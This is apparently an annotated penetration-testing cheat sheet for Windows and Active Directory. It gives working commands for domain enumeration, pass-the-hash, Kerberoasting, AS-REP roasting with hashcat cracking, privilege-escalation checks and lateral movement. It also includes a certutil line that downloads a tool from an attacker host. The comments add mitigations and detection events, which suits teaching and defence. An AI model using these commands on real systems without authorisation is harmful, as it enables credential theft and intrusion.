
Windows & Active Directory

Enumeration

# Current user info
# Shows SID, group memberships and privileges of the current token; the privilege
# list (e.g. SeImpersonate/SeDebug) is what decides which escalation paths apply.
whoami /all

# Local users and groups
net user
net localgroup administrators

# Domain info
# These resolve through the DC over SAMR/LDAP; a workstation account querying
# "Domain Admins" membership is a common early reconnaissance indicator.
net user /domain
net group "Domain Admins" /domain
nltest /domain_trusts
# BloodHound ingestor (from Linux)
# Collects LDAP objects and SMB session/local-group data as <user> and writes
# JSON files to the current directory; the output maps attack paths for the
# whole domain, so protect and destroy it like credential material.
# Defenders: -c All is noisy — bulk LDAP queries plus SMB connections to many
# hosts from a single source in a short window.
bloodhound-python -u <user> -p <pass> -d <domain> -ns <dc_ip> -c All

# Enum4linux
# Wraps rpcclient/smbclient/nmblookup; -a runs every check (users, shares,
# password policy, RID cycling) and is very chatty on the wire.
enum4linux -a <target>

# CrackMapExec — SMB enumeration
# NOTE: -p <pass> on the command line lands in shell history and the process
# list; prefer reading credentials from a file or environment where possible.
crackmapexec smb <target> -u <user> -p <pass> --shares
crackmapexec smb <target> -u <user> -p <pass> --users
crackmapexec smb <target> -u <user> -p <pass> --groups

Pass the Hash

# CrackMapExec
# Pass-the-hash works because NTLM authenticates with the NT hash itself: a stolen
# hash is as good as the password until the password is changed.
# Mitigations: unique local admin passwords (LAPS), Protected Users group for
# domain accounts (blocks NTLM), and the "Restrict NTLM" audit/deny policies.
# Detection: 4624 with logon type 3 and authentication package NTLM on the
# target, typically from a host that would not normally reach it over SMB.
crackmapexec smb <target> -u administrator -H <ntlm_hash>

# Evil-WinRM
# Same hash, different transport (WinRM over 5985); logon artifacts appear on
# the target as 4624 type 3 plus a wsmprovhost.exe session.
evil-winrm -i <target> -u administrator -H <ntlm_hash>

# Impacket psexec
# Uploads a service binary to ADMIN$ and installs a service — leaves a 7045
# (service installed) event and a file write on the target, so it is the
# loudest of the three.
impacket-psexec administrator@<target> -hashes :<ntlm_hash>

Kerberoasting

# Get SPNs and request tickets
# Any domain user can request a TGS for any account with an SPN; the ticket is
# encrypted under the service account's password hash, so it can be cracked
# offline (below) without further contact with the DC.
# Mitigations: long random passwords or gMSA for service accounts; disable RC4
# for them so tickets are AES-encrypted (far slower to crack than mode 13100).
# Detection: burst of 4769 TGS requests, especially with encryption type
# 0x17 (RC4), from one account/host.
impacket-GetUserSPNs <domain>/<user>:<pass> -dc-ip <dc_ip> -request -outputfile hashes.txt

# Crack with hashcat (mode 13100)
# 13100 = Kerberos 5 TGS-REP etype 23 (RC4-HMAC). Purely offline; generates no
# events on the domain.
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

AS-REP Roasting

# Find accounts with no pre-auth
# Only accounts with "Do not require Kerberos preauthentication"
# (UF_DONT_REQUIRE_PREAUTH) set are affected; without a valid user the tool
# needs a candidate list (users.txt), hence the dependency on earlier enumeration.
# Mitigation: audit for and clear that flag — it is almost never required.
# Detection: 4768 on the DC with Pre-Authentication Type 0 for the probed users.
impacket-GetNPUsers <domain>/ -usersfile users.txt -dc-ip <dc_ip> -format hashcat -outputfile asrep_hashes.txt

# Crack with hashcat (mode 18200)
# 18200 = Kerberos 5 AS-REP etype 23. Offline against the captured file.
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt

Privilege Escalation

# Check for unquoted service paths
# Lists auto-start services outside C:\Windows; an unquoted ImagePath with
# spaces lets a user who can write to an earlier path component hijack the
# service. Remediation: quote the path and restrict write ACLs on its directories.
# NOTE(review): wmic is deprecated and may be absent on recent Windows builds.
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"

# AlwaysInstallElevated check
# The weakness exists only when BOTH keys are set to 1 (any user can then run an
# MSI as SYSTEM). Defenders should leave this policy disabled; it has no
# legitimate use on hardened systems.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# Scheduled tasks
# NOTE(review): findstr treats a space-separated search string as several
# independent terms and has no \| alternation, so this filter likely matches
# more than intended; one /C:"..." per phrase gives the intended behaviour.
schtasks /query /fo LIST /v | findstr /i "task name\|run as\|status"
# WinPEAS (from Kali, serve via HTTP, fetch on target)
# http.server exposes the entire current directory to anyone who can reach the
# port; run it from a directory holding only what you mean to share and stop it
# when done.
python3 -m http.server 8080
# On target:
# certutil -urlcache -split -f http://<kali_ip>:8080/winpeas.exe winpeas.exe
# Defenders: certutil fetching an executable from a remote URL is a well-known
# LOLBin pattern; 4688 with command-line auditing (or Sysmon event 1) captures
# it and most EDRs alert on it.

Lateral Movement

# WMI exec
# Runs commands over DCOM/WMI (TCP 135 plus dynamic RPC ports) without
# dropping a binary; on the target this shows as a 4624 type 3 logon and
# child processes spawned under WmiPrvSE.exe.
impacket-wmiexec <domain>/<user>:<pass>@<target>

# SMBexec
# Creates a service per command instead of uploading a binary; still leaves
# 7045/4697 service-installation events, so it is not quieter than psexec
# from a logging standpoint.
impacket-smbexec <domain>/<user>:<pass>@<target>

# Evil-WinRM (WinRM / port 5985)
# 5985 is the HTTP listener (messages are still encrypted with the NTLM/Kerberos
# session key); 5986 is HTTPS. Requires the user to be in Remote Management
# Users or local Administrators on <target>. Credentials on the command line
# end up in shell history — see note in the enumeration section.
evil-winrm -i <target> -u <user> -p <pass>